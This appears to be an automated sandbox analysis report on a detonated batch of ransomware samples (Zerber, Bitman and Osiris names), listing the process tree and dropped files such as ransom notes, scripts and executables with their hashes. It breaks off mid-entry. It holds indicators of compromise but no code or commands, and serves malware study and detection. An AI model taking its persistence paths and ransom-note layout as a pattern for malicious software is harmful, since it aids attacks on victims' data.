                                                                                                                                                  Trojan-Ransom.Win32.Zerber.tal-22e915979fce372775d6f34046cdcbdf63d52c99ff844c8264ebbb3423c9216c.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:2292
                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                              1⤵
                                                                                                                                                PID:1368
                                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:2076
                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "203353099011961686751611693750129724462313658992711822514117-1065284246242316046"
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:2984
                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-1119051618747958620225426778715546216-920648903-4188543944261404031121858939"
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:3064
                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1080
                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "2108560609456790966-618504876-426276931968684868696256091-782149658-382879761"
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1692
                                                                                                                                                    • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                      C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2060
                                                                                                                                                      • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                        C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2644
                                                                                                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                          C:\Windows\system32\AUDIODG.EXE 0x4d4
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2752
                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "1625884089604007634-1442012000-5237111081545746896-12769879586308416502986112"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1556
                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "1018586977-411680378101768113815756513346204348991338300799517588170-1679407145"
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2380
                                                                                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                                                                                taskeng.exe {D7C38A63-EBF2-41A5-83E6-FEF9C09B1462} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2264
                                                                                                                                                                  • C:\Program Files (x86)\Windows\win.exe
                                                                                                                                                                    "C:\Program Files (x86)\Windows\win.exe" /startup
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:204
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\mtstocom.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\mtstocom.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1664
                                                                                                                                                                    • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                      C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2144
                                                                                                                                                                      • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                        C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:2368

                                                                                                                                                                        Network

                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                        Replay Monitor

                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                        Downloads

                                                                                                                                                                        • C:\!HELP_SOS.hta

                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          MD5

                                                                                                                                                                          4f84ac1db0a4d4649b28b4d81adff3d0

                                                                                                                                                                          SHA1

                                                                                                                                                                          24d991a89561fde981b54752dfa2b64712643643

                                                                                                                                                                          SHA256

                                                                                                                                                                          7552f91218b2b30fd22c79cf5e5925585125070503caa5a264cb842b9b046e93

                                                                                                                                                                          SHA512

                                                                                                                                                                          aa811c125f96d272bd2744e51910ed8af30dc49a3911a07efdd46978168abb5b1bdeb9185e7e4ccd47594b16aa23a51b63417235d463eed519e61b6a0bc27359

                                                                                                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+bdhsn.html

                                                                                                                                                                          Filesize

                                                                                                                                                                          9KB

                                                                                                                                                                          MD5

                                                                                                                                                                          09e3280046a7874fad72aa7ec225bb19

                                                                                                                                                                          SHA1

                                                                                                                                                                          3e8f41b0cf765cbd2656efb16283271905e5b299

                                                                                                                                                                          SHA256

                                                                                                                                                                          ef61cf84aa79cadf2062752cb86ec8ac701add29daa875ecf75fcb5c446424d9

                                                                                                                                                                          SHA512

                                                                                                                                                                          8f20506467caa1d4dd797affeaa22fd60c3969d263386c47e1399dab80a0e4bf5dcc17a9764c6e5cbb91cdb8604cbf3215bd7970200c9ecac83dd46a498dc508

                                                                                                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+bdhsn.png

                                                                                                                                                                          Filesize

                                                                                                                                                                          68KB

                                                                                                                                                                          MD5

                                                                                                                                                                          714ddfefeaeb85b85d7e85982ec1ba33

                                                                                                                                                                          SHA1

                                                                                                                                                                          ae3a3ccffff8aebbba5270539380ed6690d2eec3

                                                                                                                                                                          SHA256

                                                                                                                                                                          f30ac8de03656bfae9055979efdecbc0c1b18a41ab8647a4ab4c74999f2f6ae0

                                                                                                                                                                          SHA512

                                                                                                                                                                          22e48d3a6a3e433d5b0efdec68b67d5b001c4355e2807c0225288611cdfa3099dd8a0aac7743b3d7742ea31fb374f54d26a7e9ec010fe6b6bb70ee9b26d68815

                                                                                                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+bdhsn.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          38acadfc7942da7ada891786a72c5df2

                                                                                                                                                                          SHA1

                                                                                                                                                                          13da9b2ed96c5226ae7060abacb65ed4eefce8b0

                                                                                                                                                                          SHA256

                                                                                                                                                                          629b2f9c67a3295f8b3be93fa9f6cb76dedb5abe8773cc8fce92ab5a4bf55220

                                                                                                                                                                          SHA512

                                                                                                                                                                          43677863f7bca9ea31ef30df07188914b3d1e41bb6936a946a3b05d72db368b5b973601ddca2e03d4a70fd6217a02ce7d33a99d8187490a44b87793e8cc1a13f

                                                                                                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_RECoVERY_+dfhfb.html

                                                                                                                                                                          Filesize

                                                                                                                                                                          9KB

                                                                                                                                                                          MD5

                                                                                                                                                                          89f5c3dfcb9fe25c9d1fd177da12a05a

                                                                                                                                                                          SHA1

                                                                                                                                                                          f109f060bdf04bd8f67184523883870304c16f9b

                                                                                                                                                                          SHA256

                                                                                                                                                                          626bd03cada3ac3be60f01153d336685038a08ac646fde2f9d086e6241d9b24e

                                                                                                                                                                          SHA512

                                                                                                                                                                          3499e3faeea0ee0d8ac19ad33bed4c9bf1d2e75e72ddc92b66cfc3ff3159ac2eb41b85ef71cd83712c66c08c840bd69937a496db072c0d5d86b32298304b245d

                                                                                                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_RECoVERY_+dfhfb.png

                                                                                                                                                                          Filesize

                                                                                                                                                                          63KB

                                                                                                                                                                          MD5

                                                                                                                                                                          86d8f4a2a8128af654a10dca6b36711a

                                                                                                                                                                          SHA1

                                                                                                                                                                          e3657abeb6a3b75efb6318794fe2c97baba64cf1

                                                                                                                                                                          SHA256

                                                                                                                                                                          eec82303f62c85db18da06ce8efaa6fed48d31b0a695702586ebd68a3d62b91f

                                                                                                                                                                          SHA512

                                                                                                                                                                          3f25ec4733fed998d6a5435e4a79b038133e6be4b15bdb023cef22cbf3ded5f8f99e08eeb807802319204344f06544fcc57a7c802a509fc80a19144bd8232f67

                                                                                                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_RECoVERY_+dfhfb.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

                                                                                                                                                                          7142e4306f3559c1dd808314eca77576

                                                                                                                                                                          SHA1

                                                                                                                                                                          ed0b48f9ac0a429fdb80d344553cbf65aa0bcef2

                                                                                                                                                                          SHA256

                                                                                                                                                                          36cd7dff4e0493e9b6e27f67deda934ec0ba92e1b9ea594eb1c3c43a920f539a

                                                                                                                                                                          SHA512

                                                                                                                                                                          d1413d3c8198f09e522a8dc08933b44098e12eccb42cd93b5aa92f2e701d369c2d49862c337d002160ec41bf95e60f448f977f201be3a43285a5568daa6e841c

                                                                                                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+vtjds.html

                                                                                                                                                                          Filesize

                                                                                                                                                                          11KB

                                                                                                                                                                          MD5

                                                                                                                                                                          3ef3a7e4363e3fcb9bc055ba9ef2768a

                                                                                                                                                                          SHA1

                                                                                                                                                                          b1a624b6c054564d7997fa458f9f29d338580b9d

                                                                                                                                                                          SHA256

                                                                                                                                                                          e46aa2fcd0ba33977923f984d2b7105f8e36dee9fe212a5ca9fca39f47877288

                                                                                                                                                                          SHA512

                                                                                                                                                                          a4ffed43341082a000f238889e9511ffc347769a42cd84710f30da4fc12ea96b0011124580a5514dbeb7713250dde097105f0f136712e6107996f36a3d0d8f55

                                                                                                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+vtjds.png

                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          MD5

                                                                                                                                                                          c1c91c48dac82b0bcfdc3f3444ad235f

                                                                                                                                                                          SHA1

                                                                                                                                                                          b47da1ea0561e35f5fbcca8f743b83fe2ad43d12

                                                                                                                                                                          SHA256

                                                                                                                                                                          d267f98711e4ab469a54b367fa095e8b3b92268e5c819fbdab0f97e191c00a6e

                                                                                                                                                                          SHA512

                                                                                                                                                                          067dd7f452b2d9edbf278f38bdb25d62617a4ad50c438d9df3da7515da3731dde093ee91c3db2d60683eccad1759cb8ac47bf3e0da5204e541a5b6ae6c421e39

                                                                                                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+vtjds.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

                                                                                                                                                                          5b9d4c215b37496ee436fabb4c0e8e52

                                                                                                                                                                          SHA1

                                                                                                                                                                          dc9b2cd08598e642976387b1a24f54414ce159e3

                                                                                                                                                                          SHA256

                                                                                                                                                                          9c216038ec41cb0b9c8dded3f256c39750fe82eca63feefa06cdd4155d41f85a

                                                                                                                                                                          SHA512

                                                                                                                                                                          9502903179df1a705b1faf5873dcc51d70bc5e71de7e2719dfbc74d821b7c672910acf01b9da8ef9badcffb89c7366da3fc246df2b6817aec5fbdad35999d6f8

                                                                                                                                                                        • C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\OSIRIS-f592.htm

                                                                                                                                                                          Filesize

                                                                                                                                                                          8KB

                                                                                                                                                                          MD5

                                                                                                                                                                          2fcb72a631f6cec0748df8a81ec7ac9a

                                                                                                                                                                          SHA1

                                                                                                                                                                          9ddba3584ce531f691ed801e29a7bb9720c8652a

                                                                                                                                                                          SHA256

                                                                                                                                                                          0c7140f33863c9535d03ccdfec12bf460e2510e0791df6d03119b551a5db9e0e

                                                                                                                                                                          SHA512

                                                                                                                                                                          83bc56d575bc6bec2bdb68aa95e9fbedd55eedbf74affcedf69b22aff424c27d04c18e668a64e33d38d75cc4e387e797ac3b0fbfe2b97a7f34fc55a8ab476138

                                                                                                                                                                        • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          11KB

                                                                                                                                                                          MD5

                                                                                                                                                                          c4519b61d3a5f0117cf13eaf1ebb18c8

                                                                                                                                                                          SHA1

                                                                                                                                                                          b041cd2d438f2aacaa0758aa19ea4fbc5ca5f7c5

                                                                                                                                                                          SHA256

                                                                                                                                                                          8c170cd12c98299b268489ec40a1e744ba276f6c8f53f187acf0ad288b66af6c

                                                                                                                                                                          SHA512

                                                                                                                                                                          f4c840e04039abc7d9d1b45ad9f733ade078bbe093586602815fdedb8d377207a229e5b092759c5e1e37bb2002e073bf0c43827de0f0ba266aa613aed779dc54

                                                                                                                                                                        • C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          109KB

                                                                                                                                                                          MD5

                                                                                                                                                                          e604e0860b206e4569a6eb74e4085db2

                                                                                                                                                                          SHA1

                                                                                                                                                                          f3c5d1ef246113646d727fb4816674da32451d13

                                                                                                                                                                          SHA256

                                                                                                                                                                          cb45467f6291f4260e5af858e20bb231426138ca8ce6aa6c4c61dc6fab8b3b8d

                                                                                                                                                                          SHA512

                                                                                                                                                                          56b2bb93714e14cccd181d8ac2c0c6afa2e1df0521765b5148399ef5c68c6c3144e5be7c226fa554d72afaa4ebb4fc985e89c2abaf4036fecb9753c3c7d5ed15

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                          Filesize

                                                                                                                                                                          342B

                                                                                                                                                                          MD5

                                                                                                                                                                          c6abf50ffde786f4d8857dd3da2fa765

                                                                                                                                                                          SHA1

                                                                                                                                                                          4a9f6fb8c9f77ac935d95eeebf1f404abdd369e6

                                                                                                                                                                          SHA256

                                                                                                                                                                          916390acb1ecca3f53850a983e962f9d9b00e058cb2980aa98dc146176fb11e5

                                                                                                                                                                          SHA512

                                                                                                                                                                          294c607c180d36e17e71728af800b8974894d2f6f125fc152cd70ad10738690ef95bcbe265c585d129ae9062ad6238d714428e422e8c27327f3cb5f5cc159c29

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                          Filesize

                                                                                                                                                                          342B

                                                                                                                                                                          MD5

                                                                                                                                                                          360e4d39a2e2d97e851f03591b980bd1

                                                                                                                                                                          SHA1

                                                                                                                                                                          538d2cd45eb93d999281ed57ce5192cb8273aed3

                                                                                                                                                                          SHA256

                                                                                                                                                                          813191235b5ffc3426bd8372ab725dc2bf1ae1e31b9669a7e2d2334df9374a4e

                                                                                                                                                                          SHA512

                                                                                                                                                                          077e8a9d6893963a243a0e71d2980247d7e7f411a120f80ba68994836be6bb20f05c51b2b3b3182d8925631e6d1c2973744b4e670e1ec62151f453fe24e71cb1

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                          Filesize

                                                                                                                                                                          342B

                                                                                                                                                                          MD5

                                                                                                                                                                          79655deee6bf587a0e5ea4f4ed7e8dc3

                                                                                                                                                                          SHA1

                                                                                                                                                                          35b3341ac4774bf7ff8225137c904726f057b5ad

                                                                                                                                                                          SHA256

                                                                                                                                                                          ef80f368502bf1fce134c9545921f31b2e2280ae852465d6aa21b0e50121825d

                                                                                                                                                                          SHA512

                                                                                                                                                                          71c0e57b6a7c7db7ed628ae8b656a30274a912702cb07690645d76cc52ce052b3d199d6f27e87ca7690ea3063d667332d9445302403d386aa38b64c2fa7c1a05

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                          Filesize

                                                                                                                                                                          342B

                                                                                                                                                                          MD5

                                                                                                                                                                          8d251c284701221dfb736b4908b0b3d6

                                                                                                                                                                          SHA1

                                                                                                                                                                          7b3cd8d9ba584285058c50136101b1133e49d323

                                                                                                                                                                          SHA256

                                                                                                                                                                          4631d59b91714e6629ecb7cf3c14ad26701f9ecdafaabcc79bba6c4539e6a980

                                                                                                                                                                          SHA512

                                                                                                                                                                          cbe3db0ca9f2fe302b686af61791b77e16b4c4a8d3cc9011372ed8dbcdf0042734eee8095e5820b020489f63397cb93e58d67bc2a526d6cadce2468219c40d34

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                          Filesize

                                                                                                                                                                          342B

                                                                                                                                                                          MD5

                                                                                                                                                                          d33f6e17e5c5c09d8792728889bd246f

                                                                                                                                                                          SHA1

                                                                                                                                                                          0858870204a1e75255e0cbaf14b45f8326160496

                                                                                                                                                                          SHA256

                                                                                                                                                                          c69b5b9818398ce7ae908214a66543d3c7844dcd0b0f3194f5f038873120d833

                                                                                                                                                                          SHA512

                                                                                                                                                                          679c08e298b48a5ecf63e5000c6729795c512a904a997c8f174def627ed0bd621a92a1464468904d5c18df50f3d345f78f49c0a1651a3b508eb93b8a157f525e

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                          Filesize

                                                                                                                                                                          342B

                                                                                                                                                                          MD5

                                                                                                                                                                          4701dd1d9d5ae6c0928975d6423eef6f

                                                                                                                                                                          SHA1

                                                                                                                                                                          d87b24ce9ae7025a946e5dbbde26bfecea8e58f5

                                                                                                                                                                          SHA256

                                                                                                                                                                          cea7e93fef48567e9ba8616e8cd1636bc4cb19ae0ddd0cd53f269c8e04206343

                                                                                                                                                                          SHA512

                                                                                                                                                                          4364045129398c1f01198a8f7e1be4b9dc6dfaa96d2680938fc589efdece38b67e8c18168d9208305873b80e675da7e19056dbdbdc2f8559ee702238baf6e1c8

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                          Filesize

                                                                                                                                                                          342B

                                                                                                                                                                          MD5

                                                                                                                                                                          c8e941a0825fcbc500412d5c7b6630b0

                                                                                                                                                                          SHA1

                                                                                                                                                                          2103042a6c695de458aee37d37c6f42ce9f905b9

                                                                                                                                                                          SHA256

                                                                                                                                                                          17d4a41be4568b97c2e7e1d677cd313d92e0483879ad07a7d66d0aa52ccdefcd

                                                                                                                                                                          SHA512

                                                                                                                                                                          d9650f5f3d98cc4d59bcfd988e27f7a3f7113599151638c2c988ce4d9bb29b823e1b629efb34c911f97af0ffc12c708e40aafdd65ba6b8f8255fe45e9e4f1c92

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                          Filesize

                                                                                                                                                                          342B

                                                                                                                                                                          MD5

                                                                                                                                                                          08c4a5867438a58b639ab137d94facc4

                                                                                                                                                                          SHA1

                                                                                                                                                                          201dc9f1da5d9b828360a203a17c35ff8b5e4f7b

                                                                                                                                                                          SHA256

                                                                                                                                                                          675559cc75e44e41b2d5631445f37936521591432569294032a692c5a1a12e57

                                                                                                                                                                          SHA512

                                                                                                                                                                          2824fa24c66e2fee63cb48d2f9bec16e473cd73fbf6bb405edecdb1dc7542a50b630d00f33acdcce86a816c2ffd33594dee9d41b5b618a4a67b379e3e3d0787a

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                          Filesize

                                                                                                                                                                          342B

                                                                                                                                                                          MD5

                                                                                                                                                                          5edc0842c2348d33a46abc7419f5f6f0

                                                                                                                                                                          SHA1

                                                                                                                                                                          875839a468b066b7e4513538e17ca184de295f32

                                                                                                                                                                          SHA256

                                                                                                                                                                          a46cf8efd33b8d21bb2fe27944acac98255f88c385de22965aa03797bae5e6fb

                                                                                                                                                                          SHA512

                                                                                                                                                                          cd761dbaae903ebb74ef681de101be9f0a38432e6487de06ee7bb1f9c610c5647926d14f6d7a1f674eb0b7a1b85ef4a5c479e54e5d2ffcefa209508682dfbc16

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\761A.tmp\761B.vbs

                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          fad4016ce64ebf48c7067515562cd71b

                                                                                                                                                                          SHA1

                                                                                                                                                                          87e6ed5d2c78daa22110bd217f6c2d3861c4e580

                                                                                                                                                                          SHA256

                                                                                                                                                                          c4c49049676fd34a72e8f958f64f9a85302b3f9425233df9c0e064bb389d1fe8

                                                                                                                                                                          SHA512

                                                                                                                                                                          4c219356ac7c4bb7457dc66e831942cdbfcc029b7b7c873c86223c96a2ac911284e33640d15111b340a71f2f805b56a324f2636e4d3589d6457e735b9fe4b183

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\B6B2\5B59.bat

                                                                                                                                                                          Filesize

                                                                                                                                                                          112B

                                                                                                                                                                          MD5

                                                                                                                                                                          c36fbbc060ae26af9047a0dc601e2a92

                                                                                                                                                                          SHA1

                                                                                                                                                                          4755809843601a9e2aa532fb834bde2507438f97

                                                                                                                                                                          SHA256

                                                                                                                                                                          1960eefacf75fbfe789206a3f5ceae750e78063b3e54de85b9a454e5f5e9bf15

                                                                                                                                                                          SHA512

                                                                                                                                                                          9ec9c5f5dfe72ff52bf481b3feb783c447cd7568328167bdfc9e71eccff14e7c39738aa8985d6ac5a25f527bb3621754adb235343811be6942c4c4af4821e9e0

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Cab20CD.tmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          70KB

                                                                                                                                                                          MD5

                                                                                                                                                                          49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                                                                                          SHA1

                                                                                                                                                                          1723be06719828dda65ad804298d0431f6aff976

                                                                                                                                                                          SHA256

                                                                                                                                                                          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                                                                                          SHA512

                                                                                                                                                                          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FaT.bmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          3.5MB

                                                                                                                                                                          MD5

                                                                                                                                                                          f96e9524100fe82129010bd365408624

                                                                                                                                                                          SHA1

                                                                                                                                                                          1db0a5a090aef0f9d4b3d4ac923c4740e333d2c5

                                                                                                                                                                          SHA256

                                                                                                                                                                          2d9e3b393a7ab9c2e038f4685447d76032cd8b5416f59f1b412e3d224a39fa5a

                                                                                                                                                                          SHA512

                                                                                                                                                                          d143c06f9c3ace7182d9e742d191450522f3bae31ec62c1aba9d9bfeb1d1391c816eacc16630c725f12c2c730cc5354219aa8a30fd573235f88c7868ab54c7f0

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Tar216C.tmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          181KB

                                                                                                                                                                          MD5

                                                                                                                                                                          4ea6026cf93ec6338144661bf1202cd1

                                                                                                                                                                          SHA1

                                                                                                                                                                          a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                                                                                                                          SHA256

                                                                                                                                                                          8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                                                                                                                          SHA512

                                                                                                                                                                          6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\f1.vbs

                                                                                                                                                                          Filesize

                                                                                                                                                                          3KB

                                                                                                                                                                          MD5

                                                                                                                                                                          4c999bbfddd5513d08d2d414c92ac2f4

                                                                                                                                                                          SHA1

                                                                                                                                                                          23e40ea4b75dc037a5cdfce521826737090dce09

                                                                                                                                                                          SHA256

                                                                                                                                                                          9a55ac3ff3c115b686c19da0a88a9e7525aa62d49c69b107addf8efd33a16215

                                                                                                                                                                          SHA512

                                                                                                                                                                          7b48cbff08a98f273afb78262167030395fab421718df559625867b91f98fbb0eb0152e8002568428086d1bd3f03f9c9ab26fdabdf9e33ffcea8f5c56529b944

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\f9da27c9\43c3.tmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          344B

                                                                                                                                                                          MD5

                                                                                                                                                                          eb93bc1b139edee6a060f2561e591b19

                                                                                                                                                                          SHA1

                                                                                                                                                                          9ef46181184cea54d51e736959c181b3fef983d5

                                                                                                                                                                          SHA256

                                                                                                                                                                          ca5968fa7059de2912a1cf0b3cfe9100ebda9bd2c232ae86407df7cf2867d7e9

                                                                                                                                                                          SHA512

                                                                                                                                                                          19d69bafd75472bee43b1d6c8fce3315b12f05806661b31e7680aac408b867b8370f72beb52d1623bb4658e9acef4352d9920f4288edeb6d4d660a4dba75320d

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\f9da27c9\c625.tmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          134B

                                                                                                                                                                          MD5

                                                                                                                                                                          a1eb0a67fee3bc3ca9021a0270ab7b83

                                                                                                                                                                          SHA1

                                                                                                                                                                          c3a231d9e71f5dd4b4b1194c4ef596eaa27913de

                                                                                                                                                                          SHA256

                                                                                                                                                                          c9b36de545a59b571cc1ea096f04cf8c0f1f174f8b01e2b1792978e70ae45f71

                                                                                                                                                                          SHA512

                                                                                                                                                                          8d97f052ac9cbdfc6e7b50d71d421e91c2a68d82df71e3fbd439c96d27d9c3011cf80b080aef2c091043544f9b3c5153091932f063c7c8e36c6bc4fe81b51965

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\illumis.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          856KB

                                                                                                                                                                          MD5

                                                                                                                                                                          c5662c1943c7d29d65c08b58e19bac71

                                                                                                                                                                          SHA1

                                                                                                                                                                          f0cb3843df61fc98e9cf873e36895e81f9ca15de

                                                                                                                                                                          SHA256

                                                                                                                                                                          060e3a05a2ebe17fdf14723a602ab6527dfffe554886e8d933b80f15695fa08c

                                                                                                                                                                          SHA512

                                                                                                                                                                          16b8b8523477a8eee226c321c285e6df37e1986afd89b55bec97aa86b1fc1812b99956b897da2bb37f8bb73d005e410ca97b7380ac049d69719d82db472cf663

                                                                                                                                                                        • C:\Users\Admin\Desktop\00283\HEUR-Trojan-Ransom.Win32.Bitman.gen-20b534a4a522b479a8a40cab0f341bcb15545aedbc1d9a9777f4fcdb5f5c002e.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          312KB

                                                                                                                                                                          MD5

                                                                                                                                                                          fc972e9e8b81899909e783027da30f8f

                                                                                                                                                                          SHA1

                                                                                                                                                                          4edd5c1a45215ee66fa7c09568ab88a633a13dcd

                                                                                                                                                                          SHA256

                                                                                                                                                                          20b534a4a522b479a8a40cab0f341bcb15545aedbc1d9a9777f4fcdb5f5c002e

                                                                                                                                                                          SHA512

                                                                                                                                                                          99e1a263250fb672fd5a3e6a8add1a6709a8f74b948cc7a7ae96dcdf10b4bfc00087ebb0295a2dec3daa73aa89278fc7bcf6c87c8cba8f7dc016081639edf1cc

                                                                                                                                                                        • C:\Users\Admin\Desktop\00283\HEUR-Trojan-Ransom.Win32.Zerber.gen-fe60eeda829aeff61a53ed1f67af56e46bb7c430cad6af87365905e6a893a8e6.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          918KB

                                                                                                                                                                          MD5

                                                                                                                                                                          c6fece5eab5a2ecd24737fc145b61cbe

                                                                                                                                                                          SHA1

                                                                                                                                                                          d982f755d863c4739d4f153f59e5b5db5185a55d

                                                                                                                                                                          SHA256

                                                                                                                                                                          fe60eeda829aeff61a53ed1f67af56e46bb7c430cad6af87365905e6a893a8e6

                                                                                                                                                                          SHA512

                                                                                                                                                                          f51c6eed996fcd00ae1ed7f1f0e70f640967edbebee5996127d89ead34299007b0ff12973091ff78333c0b0308731852fd72f17a022504e5295b33539e666fed

                                                                                                                                                                        • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Bitman.jki-44efa26fdd2392445598aed7114f575ce4280af5859b1a94488bca21137f00d7.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          384KB

                                                                                                                                                                          MD5

                                                                                                                                                                          da5e28f362e7f5c0af1673a7a762c6de

                                                                                                                                                                          SHA1

                                                                                                                                                                          08dc37c463bad3a5804f22d292ee5d2abe2776e7

                                                                                                                                                                          SHA256
